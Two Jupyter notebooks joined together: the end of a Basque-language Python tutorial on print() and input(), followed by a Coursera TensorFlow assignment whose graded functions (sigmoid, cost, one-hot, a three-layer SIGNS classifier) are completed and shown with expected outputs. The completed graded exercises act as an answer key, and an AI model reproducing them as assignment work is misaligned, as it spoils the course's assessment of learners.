Help on built-in function print in module builtins:
print(...)
print(value, ..., sep=' ', end='\n', file=sys.stdout, flush=False)
Prints the values to a stream, or to sys.stdout by default.
Optional keyword arguments:
file: a file-like object (stream); defaults to the current sys.stdout.
sep: string inserted between values, default a space.
end: string appended after the last value, default a newline.
flush: whether to forcibly flush the stream.
###Markdown
* `sep` → balioen artean gehitutako karattere katea (defektuz, hutsunea). * `end` → amaieran gehitutako karaktere katea (defektuz, lerro berri bat). * `file` → *non* idatzi (defektuz, irteera estandarra). * `flush` → *flushin*-a behartu ala ez. `print()` funtzioa bitxia da, argumentu kopuru mugagabea duelako. Hau dela eta `sep`, `end`, `file` edo ta `flush` argumentuei beste balio bat ematea nahi badugu, beren izena erabili beharko dugu (hau beti egin daiteke):
###Code
print(a*4, b>=2, c+"?", sep=" <--> ", end="\nTHE END\n")
###Output
4 <--> True <--> kaixo?
THE END
###Markdown
Argumentuen izena jartzeak edozein ordenetan adierazteko aukera ere ematen digu:
###Code
print(a*4, b>=2, c+"?", end="\nTHE END\n", sep=" <--> ")
###Output
4 <--> True <--> kaixo?
THE END
###Markdown
Izen bidez adierazitako argumentuei *keyword* argumentu deritzo, eta beti amaieran azaldu behar dira:
###Code
print(end="\nTHE END\n", sep=" <--> ", a*4, b>=2, c+"?")
###Output
_____no_output_____
###Markdown
`input()` funtzioa`input()` funtzioak sistemaren sarrera estandarra erabiliko du, erabiltzailearengandik informazioa jaso ahal izateko teklatuaren bidez. Funtzoio honek exekuzioa geldiarazten du, erabiltzaileak *return* tekla sakatu arte. Orduan, erabiltzaileak idatzitako testua bueltatuko du
###Code
a = input()
print("Ados,",a,"idatzi duzu")
###Output
12345
Ados, 12345 idatzi duzu
###Markdown
`input()` funtzioak defektuzko `''` balioa duen `prompt` argumentua du:
###Code
help(input)
###Output
Help on method raw_input in module ipykernel.kernelbase:
raw_input(prompt='') method of ipykernel.ipkernel.IPythonKernel instance
Forward raw_input to frontends
Raises
------
StdinNotImplentedError if active frontend doesn't support stdin.
###Markdown
* `prompt` → pantailatik erakutsiko den mezua (defektuz, hutsa).Argumentu honekin, erabiltzaileari jakinaraziko diogu bere zain gaudela:
###Code
a = input("Idatzi balio bat: ")
print("Ados,",a,"idatzi duzu")
###Output
Idatzi balio bat: 12345
Ados, 12345 idatzi duzu
###Markdown
Beti kontutan izan beharreko bi gauza: 1. `input()` funtzioak bueltatzen duenarekin **ZERBAIT** egin behar da (**gorde**, adibidez). 1. `input()` funtzioak **KARAKTERE KATE** bat bueltatzen du (**ez da zenbaki bat**).
###Code
a = input("Idatzi balio bat: ")
print("Jasotako", a, "balioa", type(a), "motakoa da")
print("a * 2 :" , a*2)
a = int(a)
print("Orain", a, "balioa", type(a), "motakoa da")
print("a * 2 :" , a*2)
###Output
Idatzi balio bat: 12345
Jasotako 12345 balioa <class 'str'> motakoa da
a * 2 : 1234512345
Orain 12345 balioa <class 'int'> motakoa da
a * 2 : 24690
|
Course_2_Improving_Deep_Neural_Networks/wk3_Tensorflow+Tutorial.ipynb | ###Markdown
TensorFlow TutorialWelcome to this week's programming assignment. Until now, you've always used numpy to build neural networks. Now we will step you through a deep learning framework that will allow you to build neural networks more easily. Machine learning frameworks like TensorFlow, PaddlePaddle, Torch, Caffe, Keras, and many others can speed up your machine learning development significantly. All of these frameworks also have a lot of documentation, which you should feel free to read. In this assignment, you will learn to do the following in TensorFlow: - Initialize variables- Start your own session- Train algorithms - Implement a Neural NetworkPrograming frameworks can not only shorten your coding time, but sometimes also perform optimizations that speed up your code. 1 - Exploring the Tensorflow LibraryTo start, you will import the library:
###Code
import math
import numpy as np
import h5py
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow.python.framework import ops
from tf_utils import load_dataset, random_mini_batches, convert_to_one_hot, predict
%matplotlib inline
np.random.seed(1)
###Output
_____no_output_____
###Markdown
Now that you have imported the library, we will walk you through its different applications. You will start with an example, where we compute for you the loss of one training example. $$loss = \mathcal{L}(\hat{y}, y) = (\hat y^{(i)} - y^{(i)})^2 \tag{1}$$
###Code
y_hat = tf.constant(36, name='y_hat') # Define y_hat constant. Set to 36.
y = tf.constant(39, name='y') # Define y. Set to 39
loss = tf.Variable((y - y_hat)**2, name='loss') # Create a variable for the loss
init = tf.global_variables_initializer() # When init is run later (session.run(init)),
# the loss variable will be initialized and ready to be computed
with tf.Session() as session: # Create a session and print the output
session.run(init) # Initializes the variables
print(session.run(loss)) # Prints the loss
###Output
9
###Markdown
Writing and running programs in TensorFlow has the following steps:1. Create Tensors (variables) that are not yet executed/evaluated. 2. Write operations between those Tensors.3. Initialize your Tensors. 4. Create a Session. 5. Run the Session. This will run the operations you'd written above. Therefore, when we created a variable for the loss, we simply defined the loss as a function of other quantities, but did not evaluate its value. To evaluate it, we had to run `init=tf.global_variables_initializer()`. That initialized the loss variable, and in the last line we were finally able to evaluate the value of `loss` and print its value.Now let us look at an easy example. Run the cell below:
###Code
a = tf.constant(2)
b = tf.constant(10)
c = tf.multiply(a,b)
print(c)
###Output
Tensor("Mul:0", shape=(), dtype=int32)
###Markdown
As expected, you will not see 20! You got a tensor saying that the result is a tensor that does not have the shape attribute, and is of type "int32". All you did was put in the 'computation graph', but you have not run this computation yet. In order to actually multiply the two numbers, you will have to create a session and run it.
###Code
sess = tf.Session()
print(sess.run(c))
###Output
20
###Markdown
Great! To summarize, **remember to initialize your variables, create a session and run the operations inside the session**. Next, you'll also have to know about placeholders. A placeholder is an object whose value you can specify only later. To specify values for a placeholder, you can pass in values by using a "feed dictionary" (`feed_dict` variable). Below, we created a placeholder for x. This allows us to pass in a number later when we run the session.
###Code
# Change the value of x in the feed_dict
x = tf.placeholder(tf.int64, name = 'x')
print(sess.run(2 * x, feed_dict = {x: 3}))
sess.close()
###Output
6
###Markdown
When you first defined `x` you did not have to specify a value for it. A placeholder is simply a variable that you will assign data to only later, when running the session. We say that you **feed data** to these placeholders when running the session. Here's what's happening: When you specify the operations needed for a computation, you are telling TensorFlow how to construct a computation graph. The computation graph can have some placeholders whose values you will specify only later. Finally, when you run the session, you are telling TensorFlow to execute the computation graph. 1.1 - Linear functionLets start this programming exercise by computing the following equation: $Y = WX + b$, where $W$ and $X$ are random matrices and b is a random vector. **Exercise**: Compute $WX + b$ where $W, X$, and $b$ are drawn from a random normal distribution. W is of shape (4, 3), X is (3,1) and b is (4,1). As an example, here is how you would define a constant X that has shape (3,1):```pythonX = tf.constant(np.random.randn(3,1), name = "X")```You might find the following functions helpful: - tf.matmul(..., ...) to do a matrix multiplication- tf.add(..., ...) to do an addition- np.random.randn(...) to initialize randomly
###Code
# GRADED FUNCTION: linear_function
def linear_function():
"""
Implements a linear function:
Initializes W to be a random tensor of shape (4,3)
Initializes X to be a random tensor of shape (3,1)
Initializes b to be a random tensor of shape (4,1)
Returns:
result -- runs the session for Y = WX + b
"""
np.random.seed(1)
### START CODE HERE ### (4 lines of code)
X = tf.constant(np.random.randn(3,1), name = "X")
W = tf.constant(np.random.randn(4,3), name = "W")
b = tf.constant(np.random.randn(4,1), name = "b")
Y = tf.add(tf.matmul(W, X), b)
### END CODE HERE ###
# Create the session using tf.Session() and run it with sess.run(...) on the variable you want to calculate
### START CODE HERE ###
sess = tf.Session()
result = sess.run(Y)
### END CODE HERE ###
# close the session
sess.close()
return result
print( "result = " + str(linear_function()))
###Output
result = [[-2.15657382]
[ 2.95891446]
[-1.08926781]
[-0.84538042]]
###Markdown
*** Expected Output ***: **result**[[-2.15657382] [ 2.95891446] [-1.08926781] [-0.84538042]] 1.2 - Computing the sigmoid Great! You just implemented a linear function. Tensorflow offers a variety of commonly used neural network functions like `tf.sigmoid` and `tf.softmax`. For this exercise lets compute the sigmoid function of an input. You will do this exercise using a placeholder variable `x`. When running the session, you should use the feed dictionary to pass in the input `z`. In this exercise, you will have to (i) create a placeholder `x`, (ii) define the operations needed to compute the sigmoid using `tf.sigmoid`, and then (iii) run the session. ** Exercise **: Implement the sigmoid function below. You should use the following: - `tf.placeholder(tf.float32, name = "...")`- `tf.sigmoid(...)`- `sess.run(..., feed_dict = {x: z})`Note that there are two typical ways to create and use sessions in tensorflow: **Method 1:**```pythonsess = tf.Session() Run the variables initialization (if needed), run the operationsresult = sess.run(..., feed_dict = {...})sess.close() Close the session```**Method 2:**```pythonwith tf.Session() as sess: run the variables initialization (if needed), run the operations result = sess.run(..., feed_dict = {...}) This takes care of closing the session for you :)```
###Code
# GRADED FUNCTION: sigmoid
def sigmoid(z):
"""
Computes the sigmoid of z
Arguments:
z -- input value, scalar or vector
Returns:
results -- the sigmoid of z
"""
### START CODE HERE ### ( approx. 4 lines of code)
# Create a placeholder for x. Name it 'x'.
x = tf.placeholder(tf.float32, name='x')
# compute sigmoid(x)
sigmoid = tf.sigmoid(x)
# Create a session, and run it. Please use the method 2 explained above.
# You should use a feed_dict to pass z's value to x.
with tf.Session() as sess:
# Run session and call the output "result"
result = sess.run(sigmoid, feed_dict={x:z})
### END CODE HERE ###
return result
print ("sigmoid(0) = " + str(sigmoid(0)))
print ("sigmoid(12) = " + str(sigmoid(12)))
###Output
sigmoid(0) = 0.5
sigmoid(12) = 0.999994
###Markdown
*** Expected Output ***: **sigmoid(0)**0.5 **sigmoid(12)**0.999994 **To summarize, you how know how to**:1. Create placeholders2. Specify the computation graph corresponding to operations you want to compute3. Create the session4. Run the session, using a feed dictionary if necessary to specify placeholder variables' values. 1.3 - Computing the CostYou can also use a built-in function to compute the cost of your neural network. So instead of needing to write code to compute this as a function of $a^{[2](i)}$ and $y^{(i)}$ for i=1...m: $$ J = - \frac{1}{m} \sum_{i = 1}^m \large ( \small y^{(i)} \log a^{ [2] (i)} + (1-y^{(i)})\log (1-a^{ [2] (i)} )\large )\small\tag{2}$$you can do it in one line of code in tensorflow!**Exercise**: Implement the cross entropy loss. The function you will use is: - `tf.nn.sigmoid_cross_entropy_with_logits(logits = ..., labels = ...)`Your code should input `z`, compute the sigmoid (to get `a`) and then compute the cross entropy cost $J$. All this can be done using one call to `tf.nn.sigmoid_cross_entropy_with_logits`, which computes$$- \frac{1}{m} \sum_{i = 1}^m \large ( \small y^{(i)} \log \sigma(z^{[2](i)}) + (1-y^{(i)})\log (1-\sigma(z^{[2](i)})\large )\small\tag{2}$$
###Code
# GRADED FUNCTION: cost
def cost(logits, labels):
"""
Computes the cost using the sigmoid cross entropy
Arguments:
logits -- vector containing z, output of the last linear unit (before the final sigmoid activation)
labels -- vector of labels y (1 or 0)
Note: What we've been calling "z" and "y" in this class are respectively called "logits" and "labels"
in the TensorFlow documentation. So logits will feed into z, and labels into y.
Returns:
cost -- runs the session of the cost (formula (2))
"""
### START CODE HERE ###
# Create the placeholders for "logits" (z) and "labels" (y) (approx. 2 lines)
z = tf.placeholder(tf.float32, shape=np.shape(logits))
y = tf.placeholder(tf.float32, shape=np.shape(labels))
# Use the loss function (approx. 1 line)
cost = tf.nn.sigmoid_cross_entropy_with_logits(logits=z, labels=y)
# Create a session (approx. 1 line). See method 1 above.
sess = tf.Session()
# Run the session (approx. 1 line).
cost = sess.run(cost,feed_dict={y:labels,z:logits})
# Close the session (approx. 1 line). See method 1 above.
sess.close()
### END CODE HERE ###
return cost
logits = sigmoid(np.array([0.2,0.4,0.7,0.9]))
cost = cost(logits, np.array([0,0,1,1]))
print ("cost = " + str(cost))
###Output
cost = [ 1.00538719 1.03664088 0.41385433 0.39956614]
###Markdown
** Expected Output** : **cost** [ 1.00538719 1.03664088 0.41385433 0.39956614] 1.4 - Using One Hot encodingsMany times in deep learning you will have a y vector with numbers ranging from 0 to C-1, where C is the number of classes. If C is for example 4, then you might have the following y vector which you will need to convert as follows:This is called a "one hot" encoding, because in the converted representation exactly one element of each column is "hot" (meaning set to 1). To do this conversion in numpy, you might have to write a few lines of code. In tensorflow, you can use one line of code: - tf.one_hot(labels, depth, axis) **Exercise:** Implement the function below to take one vector of labels and the total number of classes $C$, and return the one hot encoding. Use `tf.one_hot()` to do this.
###Code
# GRADED FUNCTION: one_hot_matrix
def one_hot_matrix(labels, C):
"""
Creates a matrix where the i-th row corresponds to the ith class number and the jth column
corresponds to the jth training example. So if example j had a label i. Then entry (i,j)
will be 1.
Arguments:
labels -- vector containing the labels
C -- number of classes, the depth of the one hot dimension
Returns:
one_hot -- one hot matrix
"""
### START CODE HERE ###
# Create a tf.constant equal to C (depth), name it 'C'. (approx. 1 line)
C = tf.constant(C)
# Use tf.one_hot, be careful with the axis (approx. 1 line)
one_hot_matrix = tf.one_hot(labels, C, axis=0)
# Create the session (approx. 1 line)
sess = tf.Session()
# Run the session (approx. 1 line)
one_hot = sess.run(one_hot_matrix)
# Close the session (approx. 1 line). See method 1 above.
sess.close()
### END CODE HERE ###
return one_hot
labels = np.array([1,2,3,0,2,1])
one_hot = one_hot_matrix(labels, C = 4)
print ("one_hot = " + str(one_hot))
###Output
one_hot = [[ 0. 0. 0. 1. 0. 0.]
[ 1. 0. 0. 0. 0. 1.]
[ 0. 1. 0. 0. 1. 0.]
[ 0. 0. 1. 0. 0. 0.]]
###Markdown
**Expected Output**: **one_hot** [[ 0. 0. 0. 1. 0. 0.] [ 1. 0. 0. 0. 0. 1.] [ 0. 1. 0. 0. 1. 0.] [ 0. 0. 1. 0. 0. 0.]] 1.5 - Initialize with zeros and onesNow you will learn how to initialize a vector of zeros and ones. The function you will be calling is `tf.ones()`. To initialize with zeros you could use tf.zeros() instead. These functions take in a shape and return an array of dimension shape full of zeros and ones respectively. **Exercise:** Implement the function below to take in a shape and to return an array (of the shape's dimension of ones). - tf.ones(shape)
###Code
# GRADED FUNCTION: ones
def ones(shape):
"""
Creates an array of ones of dimension shape
Arguments:
shape -- shape of the array you want to create
Returns:
ones -- array containing only ones
"""
### START CODE HERE ###
# Create "ones" tensor using tf.ones(...). (approx. 1 line)
ones = tf.ones(shape)
# Create the session (approx. 1 line)
sess = tf.Session()
# Run the session to compute 'ones' (approx. 1 line)
ones = sess.run(ones)
# Close the session (approx. 1 line). See method 1 above.
sess.close()
### END CODE HERE ###
return ones
print ("ones = " + str(ones([3])))
###Output
ones = [ 1. 1. 1.]
###Markdown
**Expected Output:** **ones** [ 1. 1. 1.] 2 - Building your first neural network in tensorflowIn this part of the assignment you will build a neural network using tensorflow. Remember that there are two parts to implement a tensorflow model:- Create the computation graph- Run the graphLet's delve into the problem you'd like to solve! 2.0 - Problem statement: SIGNS DatasetOne afternoon, with some friends we decided to teach our computers to decipher sign language. We spent a few hours taking pictures in front of a white wall and came up with the following dataset. It's now your job to build an algorithm that would facilitate communications from a speech-impaired person to someone who doesn't understand sign language.- **Training set**: 1080 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (180 pictures per number).- **Test set**: 120 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (20 pictures per number).Note that this is a subset of the SIGNS dataset. The complete dataset contains many more signs.Here are examples for each number, and how an explanation of how we represent the labels. These are the original pictures, before we lowered the image resolutoion to 64 by 64 pixels. **Figure 1**: SIGNS dataset Run the following code to load the dataset.
###Code
# Loading the dataset
X_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_dataset()
###Output
_____no_output_____
###Markdown
Change the index below and run the cell to visualize some examples in the dataset.
###Code
# Example of a picture
index = 0
plt.imshow(X_train_orig[index])
print ("y = " + str(np.squeeze(Y_train_orig[:, index])))
###Output
y = 5
###Markdown
As usual you flatten the image dataset, then normalize it by dividing by 255. On top of that, you will convert each label to a one-hot vector as shown in Figure 1. Run the cell below to do so.
###Code
# Flatten the training and test images
X_train_flatten = X_train_orig.reshape(X_train_orig.shape[0], -1).T
X_test_flatten = X_test_orig.reshape(X_test_orig.shape[0], -1).T
# Normalize image vectors
X_train = X_train_flatten/255.
X_test = X_test_flatten/255.
# Convert training and test labels to one hot matrices
Y_train = convert_to_one_hot(Y_train_orig, 6)
Y_test = convert_to_one_hot(Y_test_orig, 6)
print ("number of training examples = " + str(X_train.shape[1]))
print ("number of test examples = " + str(X_test.shape[1]))
print ("X_train shape: " + str(X_train.shape))
print ("Y_train shape: " + str(Y_train.shape))
print ("X_test shape: " + str(X_test.shape))
print ("Y_test shape: " + str(Y_test.shape))
###Output
number of training examples = 1080
number of test examples = 120
X_train shape: (12288, 1080)
Y_train shape: (6, 1080)
X_test shape: (12288, 120)
Y_test shape: (6, 120)
###Markdown
**Note** that 12288 comes from $64 \times 64 \times 3$. Each image is square, 64 by 64 pixels, and 3 is for the RGB colors. Please make sure all these shapes make sense to you before continuing. **Your goal** is to build an algorithm capable of recognizing a sign with high accuracy. To do so, you are going to build a tensorflow model that is almost the same as one you have previously built in numpy for cat recognition (but now using a softmax output). It is a great occasion to compare your numpy implementation to the tensorflow one. **The model** is *LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX*. The SIGMOID output layer has been converted to a SOFTMAX. A SOFTMAX layer generalizes SIGMOID to when there are more than two classes. 2.1 - Create placeholdersYour first task is to create placeholders for `X` and `Y`. This will allow you to later pass your training data in when you run your session. **Exercise:** Implement the function below to create the placeholders in tensorflow.
###Code
# GRADED FUNCTION: create_placeholders
def create_placeholders(n_x, n_y):
"""
Creates the placeholders for the tensorflow session.
Arguments:
n_x -- scalar, size of an image vector (num_px * num_px = 64 * 64 * 3 = 12288)
n_y -- scalar, number of classes (from 0 to 5, so -> 6)
Returns:
X -- placeholder for the data input, of shape [n_x, None] and dtype "float"
Y -- placeholder for the input labels, of shape [n_y, None] and dtype "float"
Tips:
- You will use None because it let's us be flexible on the number of examples you will for the placeholders.
In fact, the number of examples during test/train is different.
"""
### START CODE HERE ### (approx. 2 lines)
X = tf.placeholder(dtype=tf.float32, shape=[n_x, None])
Y = tf.placeholder(dtype=tf.float32, shape=[n_y, None])
### END CODE HERE ###
return X, Y
X, Y = create_placeholders(12288, 6)
print ("X = " + str(X))
print ("Y = " + str(Y))
###Output
X = Tensor("Placeholder_2:0", shape=(12288, ?), dtype=float32)
Y = Tensor("Placeholder_3:0", shape=(6, ?), dtype=float32)
###Markdown
**Expected Output**: **X** Tensor("Placeholder_1:0", shape=(12288, ?), dtype=float32) (not necessarily Placeholder_1) **Y** Tensor("Placeholder_2:0", shape=(10, ?), dtype=float32) (not necessarily Placeholder_2) 2.2 - Initializing the parametersYour second task is to initialize the parameters in tensorflow.**Exercise:** Implement the function below to initialize the parameters in tensorflow. You are going use Xavier Initialization for weights and Zero Initialization for biases. The shapes are given below. As an example, to help you, for W1 and b1 you could use: ```pythonW1 = tf.get_variable("W1", [25,12288], initializer = tf.contrib.layers.xavier_initializer(seed = 1))b1 = tf.get_variable("b1", [25,1], initializer = tf.zeros_initializer())```Please use `seed = 1` to make sure your results match ours.
###Code
# GRADED FUNCTION: initialize_parameters
def initialize_parameters():
"""
Initializes parameters to build a neural network with tensorflow. The shapes are:
W1 : [25, 12288]
b1 : [25, 1]
W2 : [12, 25]
b2 : [12, 1]
W3 : [6, 12]
b3 : [6, 1]
Returns:
parameters -- a dictionary of tensors containing W1, b1, W2, b2, W3, b3
"""
tf.set_random_seed(1) # so that your "random" numbers match ours
### START CODE HERE ### (approx. 6 lines of code)
W1 = tf.get_variable('W1', [25, 12288], initializer = tf.contrib.layers.xavier_initializer(seed = 1))
b1 = tf.get_variable('b1', [25, 1], initializer = tf.zeros_initializer())
W2 = tf.get_variable('W2', [12, 25], initializer = tf.contrib.layers.xavier_initializer(seed = 1))
b2 = tf.get_variable('b2', [12, 1], initializer = tf.zeros_initializer())
W3 = tf.get_variable('W3', [6, 12], initializer = tf.contrib.layers.xavier_initializer(seed = 1))
b3 = tf.get_variable('b3', [6, 1], initializer = tf.zeros_initializer())
### END CODE HERE ###
parameters = {"W1": W1,
"b1": b1,
"W2": W2,
"b2": b2,
"W3": W3,
"b3": b3}
return parameters
tf.reset_default_graph()
with tf.Session() as sess:
parameters = initialize_parameters()
print("W1 = " + str(parameters["W1"]))
print("b1 = " + str(parameters["b1"]))
print("W2 = " + str(parameters["W2"]))
print("b2 = " + str(parameters["b2"]))
###Output
W1 = <tf.Variable 'W1:0' shape=(25, 12288) dtype=float32_ref>
b1 = <tf.Variable 'b1:0' shape=(25, 1) dtype=float32_ref>
W2 = <tf.Variable 'W2:0' shape=(12, 25) dtype=float32_ref>
b2 = <tf.Variable 'b2:0' shape=(12, 1) dtype=float32_ref>
###Markdown
**Expected Output**: **W1** **b1** **W2** **b2** As expected, the parameters haven't been evaluated yet. 2.3 - Forward propagation in tensorflow You will now implement the forward propagation module in tensorflow. The function will take in a dictionary of parameters and it will complete the forward pass. The functions you will be using are: - `tf.add(...,...)` to do an addition- `tf.matmul(...,...)` to do a matrix multiplication- `tf.nn.relu(...)` to apply the ReLU activation**Question:** Implement the forward pass of the neural network. We commented for you the numpy equivalents so that you can compare the tensorflow implementation to numpy. It is important to note that the forward propagation stops at `z3`. The reason is that in tensorflow the last linear layer output is given as input to the function computing the loss. Therefore, you don't need `a3`!
###Code
# GRADED FUNCTION: forward_propagation
def forward_propagation(X, parameters):
"""
Implements the forward propagation for the model: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX
Arguments:
X -- input dataset placeholder, of shape (input size, number of examples)
parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2", "W3", "b3"
the shapes are given in initialize_parameters
Returns:
Z3 -- the output of the last LINEAR unit
"""
# Retrieve the parameters from the dictionary "parameters"
W1 = parameters['W1']
b1 = parameters['b1']
W2 = parameters['W2']
b2 = parameters['b2']
W3 = parameters['W3']
b3 = parameters['b3']
### START CODE HERE ### (approx. 5 lines) # Numpy Equivalents:
Z1 = tf.add(tf.matmul(W1, X), b1) # Z1 = np.dot(W1, X) + b1
A1 = tf.nn.relu(Z1) # A1 = relu(Z1)
Z2 = tf.add(tf.matmul(W2, A1), b2) # Z2 = np.dot(W2, a1) + b2
A2 = tf.nn.relu(Z2) # A2 = relu(Z2)
Z3 = tf.add(tf.matmul(W3, A2), b3) # Z3 = np.dot(W3,A2) + b3
### END CODE HERE ###
return Z3
tf.reset_default_graph()
with tf.Session() as sess:
X, Y = create_placeholders(12288, 6)
parameters = initialize_parameters()
Z3 = forward_propagation(X, parameters)
print("Z3 = " + str(Z3))
###Output
Z3 = Tensor("Add_2:0", shape=(6, ?), dtype=float32)
###Markdown
**Expected Output**: **Z3** Tensor("Add_2:0", shape=(6, ?), dtype=float32) You may have noticed that the forward propagation doesn't output any cache. You will understand why below, when we get to brackpropagation. 2.4 Compute costAs seen before, it is very easy to compute the cost using:```pythontf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits = ..., labels = ...))```**Question**: Implement the cost function below. - It is important to know that the "`logits`" and "`labels`" inputs of `tf.nn.softmax_cross_entropy_with_logits` are expected to be of shape (number of examples, num_classes). We have thus transposed Z3 and Y for you.- Besides, `tf.reduce_mean` basically does the summation over the examples.
###Code
# GRADED FUNCTION: compute_cost
def compute_cost(Z3, Y):
"""
Computes the cost
Arguments:
Z3 -- output of forward propagation (output of the last LINEAR unit), of shape (6, number of examples)
Y -- "true" labels vector placeholder, same shape as Z3
Returns:
cost - Tensor of the cost function
"""
# to fit the tensorflow requirement for tf.nn.softmax_cross_entropy_with_logits(...,...)
logits = tf.transpose(Z3)
labels = tf.transpose(Y)
### START CODE HERE ### (1 line of code)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels))
### END CODE HERE ###
return cost
tf.reset_default_graph()
with tf.Session() as sess:
X, Y = create_placeholders(12288, 6)
parameters = initialize_parameters()
Z3 = forward_propagation(X, parameters)
cost = compute_cost(Z3, Y)
print("cost = " + str(cost))
###Output
cost = Tensor("Mean:0", shape=(), dtype=float32)
###Markdown
**Expected Output**: **cost** Tensor("Mean:0", shape=(), dtype=float32) 2.5 - Backward propagation & parameter updatesThis is where you become grateful to programming frameworks. All the backpropagation and the parameters update is taken care of in 1 line of code. It is very easy to incorporate this line in the model.After you compute the cost function. You will create an "`optimizer`" object. You have to call this object along with the cost when running the tf.session. When called, it will perform an optimization on the given cost with the chosen method and learning rate.For instance, for gradient descent the optimizer would be:```pythonoptimizer = tf.train.GradientDescentOptimizer(learning_rate = learning_rate).minimize(cost)```To make the optimization you would do:```python_ , c = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y})```This computes the backpropagation by passing through the tensorflow graph in the reverse order. From cost to inputs.**Note** When coding, we often use `_` as a "throwaway" variable to store values that we won't need to use later. Here, `_` takes on the evaluated value of `optimizer`, which we don't need (and `c` takes the value of the `cost` variable). 2.6 - Building the modelNow, you will bring it all together! **Exercise:** Implement the model. You will be calling the functions you had previously implemented.
###Code
def model(X_train, Y_train, X_test, Y_test, learning_rate = 0.0001,
num_epochs = 1500, minibatch_size = 32, print_cost = True):
"""
Implements a three-layer tensorflow neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SOFTMAX.
Arguments:
X_train -- training set, of shape (input size = 12288, number of training examples = 1080)
Y_train -- test set, of shape (output size = 6, number of training examples = 1080)
X_test -- training set, of shape (input size = 12288, number of training examples = 120)
Y_test -- test set, of shape (output size = 6, number of test examples = 120)
learning_rate -- learning rate of the optimization
num_epochs -- number of epochs of the optimization loop
minibatch_size -- size of a minibatch
print_cost -- True to print the cost every 100 epochs
Returns:
parameters -- parameters learnt by the model. They can then be used to predict.
"""
ops.reset_default_graph() # to be able to rerun the model without overwriting tf variables
tf.set_random_seed(1) # to keep consistent results
seed = 3 # to keep consistent results
(n_x, m) = X_train.shape # (n_x: input size, m : number of examples in the train set)
n_y = Y_train.shape[0] # n_y : output size
costs = [] # To keep track of the cost
# Create Placeholders of shape (n_x, n_y)
### START CODE HERE ### (1 line)
X, Y = create_placeholders(n_x, n_y)
### END CODE HERE ###
# Initialize parameters
### START CODE HERE ### (1 line)
parameters = initialize_parameters()
### END CODE HERE ###
# Forward propagation: Build the forward propagation in the tensorflow graph
### START CODE HERE ### (1 line)
Z3 = forward_propagation(X, parameters)
### END CODE HERE ###
# Cost function: Add cost function to tensorflow graph
### START CODE HERE ### (1 line)
cost = compute_cost(Z3, Y)
### END CODE HERE ###
# Backpropagation: Define the tensorflow optimizer. Use an AdamOptimizer.
### START CODE HERE ### (1 line)
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate,
beta1=0.9,
beta2=0.999,
epsilon=1e-08).minimize(cost)
### END CODE HERE ###
# Initialize all the variables
init = tf.global_variables_initializer()
# Start the session to compute the tensorflow graph
with tf.Session() as sess:
# Run the initialization
sess.run(init)
# Do the training loop
for epoch in range(num_epochs):
epoch_cost = 0. # Defines a cost related to an epoch
num_minibatches = int(m / minibatch_size) # number of minibatches of size minibatch_size in the train set
seed = seed + 1
minibatches = random_mini_batches(X_train, Y_train, minibatch_size, seed)
for minibatch in minibatches:
# Select a minibatch
(minibatch_X, minibatch_Y) = minibatch
# IMPORTANT: The line that runs the graph on a minibatch.
# Run the session to execute the "optimizer" and the "cost", the feedict should contain a minibatch for (X,Y).
### START CODE HERE ### (1 line)
_ , minibatch_cost = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y})
### END CODE HERE ###
epoch_cost += minibatch_cost / num_minibatches
# Print the cost every epoch
if print_cost == True and epoch % 100 == 0:
print ("Cost after epoch %i: %f" % (epoch, epoch_cost))
if print_cost == True and epoch % 5 == 0:
costs.append(epoch_cost)
# plot the cost
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title("Learning rate =" + str(learning_rate))
plt.show()
# lets save the parameters in a variable
parameters = sess.run(parameters)
print ("Parameters have been trained!")
# Calculate the correct predictions
correct_prediction = tf.equal(tf.argmax(Z3), tf.argmax(Y))
# Calculate accuracy on the test set
accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
print ("Train Accuracy:", accuracy.eval({X: X_train, Y: Y_train}))
print ("Test Accuracy:", accuracy.eval({X: X_test, Y: Y_test}))
return parameters
###Output
_____no_output_____
###Markdown
Run the following cell to train your model! On our machine it takes about 5 minutes. Your "Cost after epoch 100" should be 1.016458. If it's not, don't waste time; interrupt the training by clicking on the square (⬛) in the upper bar of the notebook, and try to correct your code. If it is the correct cost, take a break and come back in 5 minutes!
###Code
parameters = model(X_train, Y_train, X_test, Y_test)
###Output
Cost after epoch 0: 1.855702
Cost after epoch 100: 1.016458
Cost after epoch 200: 0.733102
Cost after epoch 300: 0.572940
Cost after epoch 400: 0.468774
Cost after epoch 500: 0.381021
Cost after epoch 600: 0.313822
Cost after epoch 700: 0.254158
Cost after epoch 800: 0.203829
Cost after epoch 900: 0.166421
Cost after epoch 1000: 0.141486
Cost after epoch 1100: 0.107580
Cost after epoch 1200: 0.086270
Cost after epoch 1300: 0.059371
Cost after epoch 1400: 0.052228
###Markdown
**Expected Output**: **Train Accuracy** 0.999074 **Test Accuracy** 0.716667 Amazing, your algorithm can recognize a sign representing a figure between 0 and 5 with 71.7% accuracy.**Insights**:- Your model seems big enough to fit the training set well. However, given the difference between train and test accuracy, you could try to add L2 or dropout regularization to reduce overfitting. - Think about the session as a block of code to train the model. Each time you run the session on a minibatch, it trains the parameters. In total you have run the session a large number of times (1500 epochs) until you obtained well trained parameters. 2.7 - Test with your own image (optional / ungraded exercise)Congratulations on finishing this assignment. You can now take a picture of your hand and see the output of your model. To do that: 1. Click on "File" in the upper bar of this notebook, then click "Open" to go on your Coursera Hub. 2. Add your image to this Jupyter Notebook's directory, in the "images" folder 3. Write your image's name in the following code 4. Run the code and check if the algorithm is right!
###Code
import scipy
from PIL import Image
from scipy import ndimage
## START CODE HERE ## (PUT YOUR IMAGE NAME)
my_image = "thumbs_up.jpg"
## END CODE HERE ##
# We preprocess your image to fit your algorithm.
fname = "images/" + my_image
